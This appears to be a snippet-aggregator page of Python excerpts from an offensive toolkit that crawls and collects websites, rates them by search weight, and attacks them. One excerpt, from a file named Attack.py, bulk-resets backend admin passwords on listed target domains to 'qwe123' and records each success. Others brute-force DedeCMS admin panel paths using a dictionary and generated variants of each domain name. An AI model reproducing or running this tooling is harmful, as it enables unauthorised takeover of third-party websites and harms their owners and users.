示例#1
0
def load_url_txt():
    path = './res/注册成功'
    list = utils.get_lines(path)
    for url in list:
        if dbsqlite.data_select(url):
            continue
        dbsqlite.data_insert(url)
    print('导入初始数据:%d条' % len(list))
示例#2
0
def load_url_txt():
    try:
        path = './dict/导入采集种子'
        list = utils.get_lines(path)
        for url in list:
            url = 'http://www.' + url
            # if dbsqlite.data_select(url):
            #     continue
            dbsqlite.data_insert(url)
        print('导入初始数据:%d条' % len(list))
    except Exception as e:
        print(e)
示例#3
0
def crawling(i):
    while True:
        try:
            #title_words = ['银行', '政府', '管理', '内容', '系统']
            path = './dict/采集标题过滤字典.txt'
            title_words = utils.get_lines(path)
            domain_model = dbsqlite.data_getlist(' is_crawl = 0 limit 1')[0]
            if not domain_model:
                print('线程:%d未查到采集源,等待3s' % i)
                time.sleep(3)
                continue
            url = domain_model[1]
            print('线程%d:%s' % (i, url))
            response = my_requests(url)
            if response:
                response.encoding = response.apparent_encoding
                response2_txt = response.text
                title = re.findall('<title>(.+)</title>', response2_txt)[0]
                if any(each in title for each in title_words):
                    dbsqlite.data_update(url,
                                         "title = '%s',status = 1" % title)
                    continue
                else:
                    dbsqlite.data_update(url, "title = '%s'" % title)
                urllist = getUrllist(response.text, url)
                print('%s友链数:%d' % (url, len(urllist)))
                for curl in urllist:
                    # s = urllib.parse.urlparse(url).netloc
                    try:
                        res = utils.my_requests(url=curl,
                                                try_count=1,
                                                timeout=10)
                        if res:
                            curl = utils.format_domain(res.url, protocol=True)
                        else:
                            continue
                    except Exception as e:
                        continue
                    if dbsqlite.data_select(curl):
                        continue
                    dbsqlite.data_insert(curl)
            else:
                dbsqlite.data_update(url, 'status = 1')
        except Exception as e:
            print(e)
            continue
示例#4
0
def bash_select_weight():
    domains = list(utils.get_lines("查权重"))
    ress = {}
    domains_g = utils.group_by_list(domains, 50)
    for domains in domains_g:
        try:
            aizhan_api = "https://apistore.aizhan.com/baidurank/siteinfos/%s?domains=%s"
            res = utils.my_requests(
                aizhan_api % (my_key, "|".join(domains).replace(
                    "https://", "").replace("http://", "")))
            for data in json.loads(res.text)["data"]["success"]:
                ress.update({data["domain"]: data["pc_br"]})
        except Exception as e:
            traceback.print_exc()
    ress = sorted(ress.items(), key=lambda d: d[1], reverse=True)
    with open(file="./res/权重", mode="a") as fp:
        for res in ress:
            fp.write("\nd%s|%s" % (res[0], res[1]))
示例#5
0
    if res:
        return True
    elif num > 0:
        print("尝试重新注册:" + domain)
        return 注册(domain, num - 1)


def main():
    while True:
        # get domain
        domain = ""
        res = 注册(domain=domain)
        #结果入库


if __name__ == "__main__":
    domains = utils.get_lines("./验证注册")
    for domain in domains:
        try:
            print(domain)
            res = 注册(domain, 3)
            if res:
                with open("注册结果", "a") as f:
                    f.write(domain + '----注册成功\n')
            else:
                with open("注册结果", "a") as f:
                    f.write(domain + '----注册失败\n')
        except Exception as e:
            traceback.print_exc()
            with open("注册结果", "a") as f:
                f.write(domain + '----注册失败\n')
示例#6
0
文件: Attack.py 项目: xrq1996/Arms
                    "domain": self.domain,
                    "res": False,
                    "info": "更新后台admin密码失败"
                }
        res = self.reset_back_admin()
        return res


def attack(domain, back_ground_url):
    domain = utils.format_domain(domain, True)
    atk = Attack(domain=domain,
                 user="******",
                 pwd="qwe123",
                 back_ground_url=back_ground_url)
    res = atk.start()
    str_res = "domain:%s, info:%s" % (res["domain"], res["info"])
    print(str_res)
    if res["res"]:
        with open(file="./res/重置结果.txt", mode="a", encoding="utf-8") as fp:
            fp.write(str_res + "\n")


if __name__ == '__main__':
    domains_info = utils.get_lines("./target/重置列表")
    with open(file="./res/重置结果.txt", mode="a", encoding="utf-8") as fp:
        fp.write(
            "\n\n重置结果|%s\n" %
            time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
    for domain in domains_info:
        bk = "后台" if domain.split("|") == 1 else domain.split("|")[1]
        attack(domain=domain.split("|")[0], back_ground_url=bk)
示例#7
0
# -*- coding: utf-8 -*-
# 四、查找后台地址
#     status:
#         6:已找到
#         7:未找到 -----单独程序跑后台,找到改为6,失败改为8

import traceback
from common import utils
import threading
import requests
from threading import Thread
import time
import tldextract
from unit import dbsqlite

base_back_dict = utils.get_lines("./dict/织梦后台字典.txt")
min_group = 0
thread_num = 1
R = threading.Lock()


def get_domains(status, num=1):
    try:
        R.acquire()
        print("取数据")
        domains = dbsqlite.start_getlist(' status = %s limit %d' %
                                         (status, num))
        if len(domains) < min_group:
            return
        d_str = []
        for domain in domains:
示例#8
0
import itertools
import traceback
from common import utils
from threading import Thread
import time
import re

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
base_back_dict = utils.get_lines("./dict/织梦后台字典.txt")


def try_common(domain):
    back_dir_dict = []
    s = domain.replace("http://", "").replace("https://", "")
    n = len(s.split("."))
    if n == 2:
        path = s.split(".")[0]
        back_dir_dict = [
            path,
            "admin_%s" % path,
            "dede_%s" % path,
            "ad_%s" % path,
            "bk_%s" % path,
            "background_%s" % path,
            "houtai_%s" % path,
            "%s_admin" % path,
            "%s_dede" % path,
            "%s_ad" % path,
            "%s_bk" % path,
            "%s_background" % path,
            "%s_houtai" % path